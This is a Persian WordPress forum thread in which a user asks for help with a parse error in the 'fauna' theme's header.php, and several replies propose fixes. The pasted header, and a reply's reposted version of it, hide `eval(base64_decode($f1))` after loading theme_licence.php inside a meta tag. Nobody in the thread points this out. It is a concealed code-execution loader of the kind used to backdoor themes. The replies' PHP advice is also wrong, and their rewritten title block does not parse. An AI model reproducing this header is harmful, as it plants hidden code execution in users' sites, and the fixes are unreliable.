• اطلاعیه ها

  • Saeed Fard

   برگزاری چهارمین همایش Coder Conf و کد تخفیف برای کاربران وردپرس پارسی   20/04/97

   کدرکانف هر سال در آخرین پنجشنبه مرداد با بورد‌های مختلفی برگزار می‌گردد،امسال نیز کدرکانف در همین تاریخ با حضور برنامه نویسان مطرح کشور در بورد تخصصی جاوااسکریپت برگزار خواهد شد، یک گردهمایی متفاوت با طعم Javascript. Coderconf هر سال نسبت به سال‌های گذشته با حضور برنامه‌نویسان پر رنگتر می‌شود. ما سعی کردیم هر ساله به این کنفرانس مفهوم عمیق تری ببخشیم تا از آنچه در سال‌های گذشته عرضه شده به روزتر و مفیدتر واقع شویم. امسال فرصتی خواهد بود تا با نگرشی جدید و بهبود مطالب ارائه شده، عمیقتر به این موضوع نگاه کنیم تا بجای تکرار مباحث پیشین گامی هر چند کوچک در مسیر ارتقای دانش فنی برنامه‌نویسان ایرانی برداریم. ما در Coderconf ۴ با تمرکز بر روی Javascript نیت کرده‌ایم این فرصت را در اختیار برنامه نویسان قرار دهیم تا با ظرافت و استانداردهای روز دنیا کار خود را پیش ببرند. به نظر ما امسال زمان آن فرا رسیده‌است تا این زبان را به صورت تخصصی و از ابعاد مختلف به چالش بکشیم.   دبیر علمی همایش میلاد حیدری، کدرکانف ۴ را اینگونه توصیف کرده است :اشتراک گذاری دانش بهترین راه رسیدن به جاودانگی اطلاعات است. هر ساله همایش‌های زیادی برگزار میشه که افراد شرکت‌کننده می‌توانند با افراد مجرب شبکه سازی کنند. امسال در کدرکانف سعی کردیم علاوه بر بخش شبکه سازی بین افراد بیشتر روی انتقال دانش و کیفیت ارائه ها تمرکز داشته باشیم . به قصد یک گردهمایی بلند مدت بین برنامه‌نویسان جاوااسکریپت که با هم تبادل دانش و اطلاعات کنند گردهم آییم.
   بنده به عنوان عضو کوچکی از جامعه برنامه‌نویسان جاوااسکریپت ایران امیدوارم در کدرکانف امسال علاوه بر شبکه سازی، از اطلاعاتی که دوستان در این همایش در اختیارتان قرار می‌دهند استفاده کنید. در سایت همایش میتوانید سخنرانان و موضوع پنل همایش کدرکانف رو مشاهده کنید . علاقه‌مندان به حضور در این همایش می‌توانند با کد تخفیف wpparsi اقدام به ثبت نام در این گردهمایی کنند. سایت همایش :‌http://coderconf.org
   بلیط فروشی همایش :‌https://evand.com/events/coderconf4  
مرتضی نظری

مشکل در هیدر

6 پست در این موضوع قرار دارد

سلام

قصد دارم برای وبلاگ خودم یک قالب طراحی کنم... البته طراحی که نه میخوام یک قالب رو ویرایش کنم.... ولی تغییرات زیادی توش اعمال کنم...

یک قالب پیدا کردم که خیلی به طرح من نزدیکه اما اصلا اجرا نمیشه که بخوام ویرایشش هم کنم...

این ارور رو میده:

[b]Parse error[/b]: syntax error, unexpected end of file in [b]C:\Program Files\EasyPHP-12.1\www\wp1\wp-content\themes\fauna\header.php[/b] on line [b]112[/b]

محتوی هیدر هم اینه:

<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>

<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />

<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>

<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->

<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>

<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>

</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>

<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>

<hr />

ممنون میشم که کمکم کنید.

0

به اشتراک گذاری این پست


لینک به پست

اینو بزار ببین چی میشه

فک کنم مشکل از آخر کدت باشه . . . </ hr> دیگه چیه!؟


<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>
<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />
<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>
<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->
<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>
<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>
</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>
<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>
</head>

2

به اشتراک گذاری این پست


لینک به پست

سلام

ممنون بابت جوابتون

اتفاقا خط 112 هم میشه همون <hr /> منم تعجب کردم که این چیه!!!

مطمعنا head نیست.. چون چند خط بالاتر این خط بسته شده.. یک نکته ی دیگه هم هست: منوی سایت و تصویر هیدر رو که دیگه نمیزارن توی head که ;)

اصلا خود پوسته رو اینجا میزارم... خیلی ممنون میشم که کمکم کنید تا خوبش کنم

fauna.zip

0

به اشتراک گذاری این پست


لینک به پست

hr در واقع برای قرار دادن یه خط افقی استفاده میشه

کد دومی رو که گذاشتم به جای <head> همون </hr> رو بزارید و ازش استفاده کنید باید مشکل حل شه چون این کد با نرم افزار ++notepad سیو شده و مشکل دیگه ای نداره

تا اونجایی که من میدونم ارور سینتکس به علت اشتباه در دستورات کد نویسی پیش میاد دیگه...

1

به اشتراک گذاری این پست


لینک به پست

هر شرط در php باید به صورت


if()
{
}
else
{
};

هر کدوم از آکولادهای بسته شدن یا نقطه ویرگول آخر نباشه این ارور را دریافت می کنید که ظرهارا کد شما نقطه ویرگول ها را ندارد بگذارید تا آخر شب برایتان اصلاح می کنم

4

به اشتراک گذاری این پست


لینک به پست

کل کد اصلاحش خیلی وقت گیره این برای بخش title کده با کد فعلی title مقایسه کنید متوجه تفاوت می شوید


<title>
<?php bloginfo('name');
if (is_home() && (get_bloginfo('description') != "")
{
bloginfo('description');
}
elseif (is_category()) {
echo 'Categories';
} elseif (is_author()) {
echo'About Author';
} elseif (is_search()) {
printf(__('Search Results for: %s','fauna'), $s);
} elseif (function_exists("is_tag") or (is_tag()) {
_e(' | Tags | ','fauna'); single_tag_title();
} else {
wp_title('|');}; ?>
</title>

2

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری